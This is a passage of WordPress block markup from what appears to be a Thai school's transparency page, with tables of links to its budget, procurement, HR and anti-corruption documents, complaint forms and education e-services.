{\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"htt